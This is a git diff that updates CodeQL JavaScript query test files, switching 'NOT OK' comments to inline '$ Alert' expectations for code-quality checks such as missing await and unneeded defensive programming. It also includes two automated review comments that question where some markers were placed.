a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts @@ -1,5 +1,5 @@ declare let cache: { [x: string]: Promise }; function deleteCache(x: string) { - delete cache[x]; // OK + delete cache[x]; } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js index 10fc244dbc44..28e95513d401 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js 
@@ -5,24 +5,24 @@ async function getThing() { function useThing() { let thing = getThing(); - if (thing === undefined) {} // NOT OK + if (thing === undefined) {} // $ Alert - if (thing == null) {} // NOT OK + if (thing == null) {} // $ Alert - something(thing ? 1 : 2); // NOT OK + something(thing ? 1 : 2); // $ Alert - for (let x in thing) { // NOT OK + for (let x in thing) { // $ Alert something(x); } let obj = something(); - something(obj[thing]); // NOT OK - obj[thing] = 5; // NOT OK + something(obj[thing]); // $ Alert + obj[thing] = 5; // $ Alert - something(thing + "bar"); // NOT OK + something(thing + "bar"); // $ Alert if (something()) { - if (thing) { // NOT OK + if (thing) { // $ Alert something(3); } } @@ -31,21 +31,21 @@ function useThing() { async function useThingCorrectly() { let thing = await getThing(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // OK + return thing + "bar"; } async function useThingCorrectly2() { let thing = getThing(); - if (await thing === undefined) {} // OK + if (await thing === undefined) {} - if (await thing == null) {} // OK + if (await thing == null) {} - return thing + "bar"; // NOT OK + return thing + "bar"; // $ Alert } function getThingSync() { @@ -55,21 +55,21 @@ function getThingSync() { function useThingPossiblySync(b) { let thing = b ? getThing() : getThingSync(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // NOT OK - but we don't flag it + return thing + "bar"; // $ MISSED: Alert } function useThingInVoid() { - void getThing(); // OK + void getThing(); } function useThing() { if (random()) { - return getThing() ?? null; // NOT OK + return getThing() ?? null; // $ Alert } else { - return getThing?.() ?? null; // OK + return getThing?.() ?? null; } -} \ No newline at end of file +} 
diff --git a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js index cbfe6d3250e5..d12e82cb8c24 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js +++ b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js @@ -1,6 +1,6 @@ function total(bad) { var sum = 0 - for (var i = 0; i < bad; ++i) { // NOT OK + for (var i = 0; i < bad; ++i) { // $ Alert sum += bad[i] } return sum @@ -8,7 +8,7 @@ function total(bad) { function total_good(good) { var sum = 0 - for (var i = 0; i < good.length; ++i) { // OK + for (var i = 0; i < good.length; ++i) { sum += good[i] } return sum @@ -17,21 +17,21 @@ function total_good(good) { var fruits = ["banana", "pineapple"] function mix() { var drink = [] - for (var i = 0; i < fruits; ++i) { // NOT OK + for (var i = 0; i < fruits; ++i) { // $ Alert drink.push(fruits[i]) } } function mix_good() { var drink = [] - for (var i = 0; i < fruits.length; ++i) { // OK + for (var i = 0; i < fruits.length; ++i) { drink.push(fruits[i]) } } function overloaded(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } else if (mode == "blar") { return foo[bar]; } else { @@ -41,7 +41,7 @@ function overloaded(mode, foo, bar) { function overloaded_no_else(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } if (mode == "blar") { return foo[bar]; @@ -50,7 +50,7 @@ function overloaded_no_else(mode, foo, bar) { function reassigned(index, object) { var tmp = object.getMaximum() - if (index < tmp) { // OK + if (index < tmp) { tmp = object.getArray() return tmp[index] } 
diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js index 101c6b360b48..5016873b6a59 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js @@ -1,43 +1,40 @@ // use of .length to prime the query a.length; -// NOT OK -for (var i=0; i -
// OK +
} @@ -24,20 +24,20 @@ class Component1 extends React.Component { render() { var unbound3 = this.unbound3; return
-
// NOT OK -
// NOT OK -
// NOT OK -
// OK -
// OK -
// OK -
// OK -
this.unbound_butInvokedSafely(e)}/> // OK -
// OK -
// OK -
// OK -
// OK -
// OK -
// OK +
// $ Alert +
// $ Alert +
// $ Alert +
+
+
+
+
this.unbound_butInvokedSafely(e)}/> +
+
+
+
+
+
} @@ -125,7 +125,7 @@ class Component2 extends React.Component { render() { return
-
// OK +
; } @@ -139,7 +139,7 @@ class Component3 extends React.Component { render() { return
-
// OK +
} @@ -159,7 +159,7 @@ class Component4 extends React.Component { render() { return
-
// OK +
} @@ -177,7 +177,7 @@ class Component5 extends React.Component { render() { return
-
// OK +
} diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js index 5490b0b4232a..9aa369d69b21 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js @@ -1,10 +1,10 @@ -x.f() & 0x0A != 0; // NOT OK -x.f() & (0x0A != 0); // OK -x.f() & 0x0A != 0; // OK -x.f() & 0x0A!=0; // OK +x.f() & 0x0A != 0; // $ Alert +x.f() & (0x0A != 0); +x.f() & 0x0A != 0; +x.f() & 0x0A!=0; -x !== y & 1; // NOT OK +x !== y & 1; // $ Alert -x > 0 & x < 10; // OK +x > 0 & x < 10; -a&b==c; // NOT OK +a&b==c; // $ Alert diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js index 800b7b08df2c..d39838870c81 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js @@ -1 +1 @@ -a&b==c; // OK (minified file) +a&b==c; // OK - minified file diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html index 87f969c3e179..03ac0651186e 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html @@ -1,6 +1,6 @@ - - - + + + diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js index 0645f8821a1d..f958714431d6 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js 
@@ -1,51 +1,51 @@ -"use foo"; // NOT OK -"use strict"; // NOT OK +"use foo"; // $ Alert +"use strict"; // $ Alert function bad() { - "'use strict'"; // NOT OK - "use strict;"; // NOT OK - "'use strict';"; // NOT OK - "'use strict;'"; // NOT OK - "use-strict"; // NOT OK - "use_strict"; // NOT OK - "uses strict"; // NOT OK - "use struct;" // NOT OK - "Use Strict"; // NOT OK - "use bar"; // NOT OK + "'use strict'"; // $ Alert + "use strict;"; // $ Alert + "'use strict';"; // $ Alert + "'use strict;'"; // $ Alert + "use-strict"; // $ Alert + "use_strict"; // $ Alert + "uses strict"; // $ Alert + "use struct;" // $ Alert + "Use Strict"; // $ Alert + "use bar"; // $ Alert } function ignored() { var x = 42; - "use baz"; // OK: not a directive, positionally + "use baz"; // OK - not a directive, positionally } function good() { - "use strict"; // OK - "use asm"; // OK - "use babel"; // OK - "use 6to5"; // OK - "format cjs" // OK - "format esm"; // OK - "format global"; // OK - "format register"; // OK - "ngInject"; // OK - "ngNoInject"; // OK - "deps foo"; // OK - "deps bar"; // OK - "use server"; // OK - "use client"; // OK + "use strict"; + "use asm"; + "use babel"; + "use 6to5"; + "format cjs" + "format esm"; + "format global"; + "format register"; + "ngInject"; + "ngNoInject"; + "deps foo"; + "deps bar"; + "use server"; + "use client"; } function data() { - "[0, 0, 0];"; // NOT OK - "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // NOT OK + "[0, 0, 0];"; // $ Alert + "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // $ Alert } function yui() { - "foo:nomunge"; // OK - "bar:nomunge, baz:nomunge,qux:nomunge"; // OK - ":nomunge"; // NOT OK - "foo(), bar, baz:nomunge"; // NOT OK + "foo:nomunge"; + "bar:nomunge, baz:nomunge,qux:nomunge"; + ":nomunge"; // $ Alert + "foo(), bar, baz:nomunge"; // $ Alert } function babel_typeof(obj) { 
diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js index 8c61f38d1132..30f28719a2b7 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js @@ -7,5 +7,5 @@ var Mod1; var Mod2; (function (Mod2) { Mod2.p = 42; - })(Mod2 || (Mod2 = {})); // NOT OK + })(Mod2 || (Mod2 = {})); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js index 913684d6f6aa..a59cc7abb9e8 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js @@ -20,5 +20,5 @@ if (typeof exports !== 'undefined') { (function(){ var module; - if(typeof module === 'undefined'); // NOT OK + if(typeof module === 'undefined'); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js index cfc6f1e6df71..3807082c7434 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js 
@@ -6,10 +6,10 @@ function getDate() { return null; } console.log(date); - return date && date.getTime(); // NOT OK + return date && date.getTime(); // $ Alert } function isNotNullOrString(obj) { - return obj != null && obj != undefined && // NOT OK + return obj != null && obj != undefined && // $ Alert typeof obj != 'string'; } diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js index ace5a3dd7ac8..c036953b01eb 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js 
@@ -10,95 +10,95 @@ var o_ = o; var x_ = x; - u_ = u_ || e; // NOT OK - n_ = n_ || e; // NOT OK - o_ = o_ || e; // NOT OK + u_ = u_ || e; // $ Alert + n_ = n_ || e; // $ Alert + o_ = o_ || e; // $ Alert x_ = x_ || e; - u && u.p; // NOT OK - n && n.p; // NOT OK - o && o.p; // NOT OK + u && u.p; // $ Alert + n && n.p; // $ Alert + o && o.p; // $ Alert x && x.p; - u && u(); // NOT OK - n && n(); // NOT OK - o && o(); // NOT OK + u && u(); // $ Alert + n && n(); // $ Alert + o && o(); // $ Alert x && x(); - !u || u.p; // NOT OK - !n || n.p; // NOT OK - !o || o.p; // NOT OK + !u || u.p; // $ Alert + !n || n.p; // $ Alert + !o || o.p; // $ Alert !x || x.p; - !!u && u.p; // NOT OK - !!n && n.p; // NOT OK - !!o && o.p; // NOT OK + !!u && u.p; // $ Alert + !!n && n.p; // $ Alert + !!o && o.p; // $ Alert !!x && x.p; - u != undefined && u.p; // NOT OK - n != undefined && n.p; // NOT OK - o != undefined && o.p; // NOT OK + u != undefined && u.p; // $ Alert + n != undefined && n.p; // $ Alert + o != undefined && o.p; // $ Alert x != undefined && x.p; - u == undefined || u.p; // NOT OK - n == undefined || n.p; // NOT OK - o == undefined || o.p; // NOT OK + u == undefined || u.p; // $ Alert + n == undefined || n.p; // $ Alert + o == undefined || o.p; // $ Alert x == undefined || x.p; - u === undefined || u.p; // NOT OK - n === undefined || n.p; // NOT OK - o === undefined || o.p; // NOT OK + u === undefined || u.p; // $ Alert + n === undefined || n.p; // $ Alert + o === undefined || o.p; // $ Alert x === undefined || x.p; - if (u) { // NOT OK + if (u) { // $ Alert u.p; } - if (n) { // NOT OK + if (n) { // $ Alert n.p; } - if (o) { // NOT OK + if (o) { // $ Alert o.p; } if (x) { x.p; } - u? u():_; // NOT OK - n? n(): _; // NOT OK - o? o(): _; // NOT OK + u? u():_; // $ Alert + n? n(): _; // $ Alert + o? o(): _; // $ Alert x? 
x(): _; - if (u !== undefined) { // NOT OK + if (u !== undefined) { // $ Alert u.p; } - if (n !== undefined) { // NOT OK + if (n !== undefined) { // $ Alert n.p; } - if (o !== undefined) { // NOT OK + if (o !== undefined) { // $ Alert o.p; } if (x !== undefined) { x.p; } - if (u == undefined){} // NOT OK - if (n == undefined){} // NOT OK - if (o == undefined){} // NOT OK + if (u == undefined){} // $ Alert + if (n == undefined){} // $ Alert + if (o == undefined){} // $ Alert if (x == undefined){} - if (u != undefined){} // NOT OK - if (n != undefined){} // NOT OK - if (o != undefined){} // NOT OK + if (u != undefined){} // $ Alert + if (n != undefined){} // $ Alert + if (o != undefined){} // $ Alert if (x != undefined){} - if (typeof u === "undefined"){} // NOT OK - if (typeof n === "undefined"){} // NOT OK - if (typeof o === "undefined"){} // NOT OK + if (typeof u === "undefined"){} // $ Alert + if (typeof n === "undefined"){} // $ Alert + if (typeof o === "undefined"){} // $ Alert if (typeof x === "undefined"){} function f() { } - typeof f === "function" && f(); // NOT OK - typeof u === "function" && u(); // NOT OK + typeof f === "function" && f(); // $ Alert + typeof u === "function" && u(); // $ Alert typeof x === "function" && x(); var empty_array = []; @@ -111,9 +111,9 @@ var _true = true; var _false = false; - empty_array && empty_array.pop(); // NOT OK - pseudo_empty_array && pseudo_empty_array.pop(); // NOT OK - non_empty_array && non_empty_array.pop(); // NOT OK + empty_array && empty_array.pop(); // $ Alert + pseudo_empty_array && pseudo_empty_array.pop(); // $ Alert + non_empty_array && non_empty_array.pop(); // $ Alert empty_string && empty_string.charAt(0); non_empty_string && non_empty_string.charAt(0); zero && zero(); 
@@ -121,23 +121,23 @@ _true && _true(); _false && _false(); - (u !== undefined && u !== null) && u.p; // NOT OK - u !== undefined && u !== null && u.p; // NOT OK + (u !== undefined && u !== null) && u.p; // $ Alert + u !== undefined && u !== null && u.p; // $ Alert - u != undefined && u != null; // NOT OK - u == undefined || u == null; // NOT OK - u !== undefined && u !== null; // NOT OK - !(u === undefined) && !(u === null); // NOT OK - u === undefined || u === null; // NOT OK - !(u === undefined || u === null); // NOT OK - !(u === undefined) && u !== null; // NOT OK + u != undefined && u != null; // $ Alert + u == undefined || u == null; // $ Alert + u !== undefined && u !== null; // $ Alert + !(u === undefined) && !(u === null); // $ Alert + u === undefined || u === null; // $ Alert + !(u === undefined || u === null); // $ Alert + !(u === undefined) && u !== null; // $ Alert u !== undefined && n !== null; - u == undefined && u == null; // NOT OK + u == undefined && u == null; // $ Alert x == undefined && x == null; - x === undefined && x === null; // NOT OK + x === undefined && x === null; // $ Alert if (x === undefined) { - if (x === null) { // NOT OK + if (x === null) { // $ Alert } } @@ -153,16 +153,16 @@ } } - x != undefined && x != null; // NOT OK + x != undefined && x != null; // $ Alert if (x != undefined) { - if (x != null) { // NOT OK + if (x != null) { // $ Alert } } if (typeof x !== undefined); if (typeof window !== undefined); if (typeof x !== x); - if (typeof x !== u); // NOT OK + if (typeof x !== u); // $ Alert if (typeof window !== "undefined"); if (typeof module !== "undefined"); @@ -174,8 +174,8 @@ u && (f(), u.p); u && (u.p, f()); // technically not OK, but it seems like an unlikely pattern - u && !u.p; // NOT OK - u && !u(); // NOT OK + u && !u.p; // $ Alert + u && !u(); // $ Alert function hasCallbacks(success, error) { 
diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js index 588844f9c75f..e10c2e0e04dd 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js @@ -1,7 +1,7 @@ (function(){ var v; (function(){ - if(typeof v === "undefined"){ // NOT OK + if(typeof v === "undefined"){ // $ Alert v = 42; } for(var v in x){ @@ -9,10 +9,10 @@ }); }); -const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; // OK +const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; function f(v) { - if (typeof v === 'undefined' && v !== undefined) { // OK + if (typeof v === 'undefined' && v !== undefined) { doSomething(v); } } diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js index d9942a5ec4a8..f3f444fa86f7 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js @@ -42,14 +42,13 @@ function ok10(o, p) { return p in o&&o[p]; } -// OK + x==y ** 2; -// NOT OK -x + x >> 1 +x + x >> 1 // $ Alert + -// OK x + x >> 1 -// OK (asm.js-like) +// OK - asm.js-like x = x - 1|0; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js index b785e06507a7..6143b7084c3b 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js 
@@ -1,9 +1,7 @@ /** - * NOT OK: Parameter y is not documented. - * * @param x The first operand. */ -function f(x, y) { +function f(x, y) { // $ Alert return x+y; } @@ -14,7 +12,6 @@ function g(x, y) { return x+y; } -// NOT OK /** * @param {int} x * @param {float} y @@ -23,6 +20,6 @@ var o = { /** * @param {String} x first argument. */ - f : function(x, y) { + f : function(x, y) { // $ Alert } }; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js index de01c66ac808..a0fc28f09494 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js @@ -1,36 +1,33 @@ -// NOT OK -typeof a === 'array'; +typeof a === 'array'; // $ Alert + -// OK typeof b == 'string'; -// OK + typeof c != "string"; -// OK + "number" !== typeof 23; -// OK + 'object' == typeof null; -// OK + typeof es6 === 'symbol'; switch (typeof a) { -// OK + case 'undefined': -// NOT OK -case 'null': +case 'null': // $ Alert } -// OK + switch (msg) { case 'null': case typeof a: } -// NOT OK -(typeof a) === 'array'; +(typeof a) === 'array'; // $ Alert // JScript extensions typeof a === 'unknown' || typeof a === 'date'; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js index 69daffb8a0b0..cf64a97a4d10 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js @@ -1,7 +1,7 @@ -var a = [], // OK - b = [1], // OK - c = [1, 2], // OK - d = [1, , 2], // NOT OK - e = [1,], // OK - f = [1, 2, ,], // NOT OK - g = [,1]; // NOT OK +var a = [], + b = [1], + c = [1, 2], + d = [1, , 2], // $ Alert + e = [1,], + f = [1, 2, ,], // $ Alert + g = [,1]; // $ Alert 
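Review bot: The `// NOT OK` removed above the `@param {int} x` / `@param {float} y` JSDoc block in the `@@ -14,7 +12,6 @@` hunk has no visible `$ Alert` replacement, whereas the other two removed markers in this file were moved onto `function f(x, y) { // $ Alert` and `f : function(x, y) { // $ Alert`. The function that JSDoc block documents starts after the hunk, so I cannot see whether its declaration line received a marker. If the query still reports that function, the inline test will now fail on an unexpected result; if it no longer does, the old comment was stale and dropping it is correct. Worth confirming against the query output before relying on this file's expectations.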
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js index 202ea2a262a6..610590712eeb 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js @@ -1,8 +1,7 @@ -// NOT OK -[1, 2, 3].map(function(x) x * x); +[1, 2, 3].map(function(x) x * x); // $ Alert + -// OK [1, 2, 3].map(function(x) { return x * x; }); -// OK + [1, 2, 3].map((x) => x * x); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js index 3ed85a709341..1ffb7a489c8e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js @@ -4,24 +4,24 @@ class C { class D extends C { constructor() { - super(); // OK + super(); } } -let c = new C(); // OK -C(); // NOT OK -new (x=>x); // NOT OK -c.m(); // OK -new c.m(); // NOT OK - but not flagged +let c = new C(); +C(); // $ Alert +new (x=>x); // $ Alert +c.m(); +new c.m(); // $ MISSED: Alert var o = { f: function() {}, g() {} }; -o.f(); // OK -new o.f(); // OK -o.g(); // OK -new o.g(); // NOT OK - but not flagged +o.f(); +new o.f(); +o.g(); +new o.g(); // $ MISSED: Alert function f(b) { var g; @@ -31,31 +31,31 @@ function f(b) { g = (() => {}); console.log(); if (!b) - g(); // OK + g(); else - new g(); // OK + new g(); } function* g() {} async function h() {} -new g() // NOT OK -new h() // NOT OK +new g() // $ Alert +new h() // $ Alert -C.call(); // NOT OK -C.apply(); // NOT OK +C.call(); // $ Alert +C.apply(); // $ Alert class E { static call() {} static apply() {} } -E.call(); // OK -E.apply(); // OK +E.call(); +E.apply(); function invoke(fn) { if (typeof fn === "function" && fn.hasOwnProperty("foo")) { - fn(); // OK + fn(); } } invoke(C); 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js index 1585d8add718..3ecf658e45c9 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js @@ -1,3 +1,3 @@ function A() {} -new A(); // OK -String(""); // OK \ No newline at end of file +new A(); +String(""); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js index 407b91aec013..1c9f2e07a49a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js @@ -1,6 +1,6 @@ function A() {} -A(); // OK +A(); function MyString() {} String = MyString; -new String(); // OK \ No newline at end of file +new String(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js index 6aaeaa7a9f18..a3477727286b 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js @@ -1,2 +1,2 @@ -Array(45); // OK -new Array(45); // OK +Array(45); +new Array(45); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js index 56af21411b67..76ffbf8c155a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js 
@@ -48,13 +48,13 @@ function RobustPoint4(x, y) { new RobustPoint4(23, 42); RobustPoint4(56, 72); -// OK: Error is an external function +// OK - Error is an external function new Error(); Error(); class C {} new C(); -C(); // NOT OK, but flagged by IllegalInvocation +C(); // OK - flagged by IllegalInvocation (function() { function A(x) { @@ -64,5 +64,5 @@ C(); // NOT OK, but flagged by IllegalInvocation A.call({}, 23); })(); -new Point(42, 23); // NOT OK, but not flagged since line 6 above was already flagged -Point(56, 72); // NOT OK, but not flagged since line 7 above was already flagged +new Point(42, 23); // OK - not flagged since line 6 above was already flagged +Point(56, 72); // OK - not flagged since line 7 above was already flagged diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js index 1015db92cff4..5c12a3b7d853 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js @@ -1,11 +1,11 @@ -var o1 = { __proto__: null }; // OK -Object.setPrototypeOf(o1, Function.prototype); // OK -Object.create(class{}); // OK -Function.prototype.isPrototypeOf(o1); // OK -o1.__proto__ = new Date(); // OK +var o1 = { __proto__: null }; +Object.setPrototypeOf(o1, Function.prototype); +Object.create(class{}); +Function.prototype.isPrototypeOf(o1); +o1.__proto__ = new Date(); -var o2 = { __proto__: undefined }; // NOT OK -Object.setPrototypeOf(o2, 42); // NOT OK -Object.create(true); // NOT OK -"function".isPrototypeOf(o2); // NOT OK +var o2 = { __proto__: undefined }; // $ Alert +Object.setPrototypeOf(o2, 42); // $ Alert +Object.create(true); // $ Alert +"function".isPrototypeOf(o2); // $ Alert 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js index c819b10ad56a..24134e1ca07c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js @@ -1,43 +1,38 @@ -// BAD: Loop upper bound is off-by-one -for (var i = 0; i <= args.length; i++) { +for (var i = 0; i <= args.length; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// BAD: Loop upper bound is off-by-one -for (var i = 0; args.length >= i; i++) { +for (var i = 0; args.length >= i; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// GOOD: Loop upper bound is correct +// OK - Loop upper bound is correct for (var i = 0; i < args.length; i++) { console.log(args[i]); } var j = 0; -// BAD: Off-by-one on index validity check -if (j <= args.length) { +if (j <= args.length) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// BAD: Off-by-one on index validity check -if (args.length >= j) { +if (args.length >= j) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// GOOD: Correct terminating value +// OK - Correct terminating value if (args.length > j) { console.log(args[j]); } -// BAD: incorrect upper bound -function badContains(a, elt) { +function badContains(a, elt) { // $ Alert - incorrect upper bound for (let i = 0; i <= a.length; ++i) if (a[i] === elt) return true; return false; } -// GOOD: correct upper bound +// OK - correct upper bound function goodContains(a, elt) { for (let i = 0; i < a.length; ++i) if (a[i] === elt) 
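Review bot: In the first hunk the marker for `badContains` sits on the declaration, `function badContains(a, elt) { // $ Alert - incorrect upper bound`, while every other expectation in the same hunk sits on the line holding the `<=`/`>=` comparison the query reports. Unless the query anchors this result on the function rather than the comparison, the expectation belongs on the loop line: `for (let i = 0; i <= a.length; ++i) // $ Alert - incorrect upper bound`. The old comment sat on its own line above the function, so this looks like a mechanical move rather than a deliberate placement. Separately, the file defines `badContains` twice (the second, in the later hunk, is the `OK - ... but extra check` variant); that is pre-existing, but giving the second one a distinct name would make the expected output easier to read.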
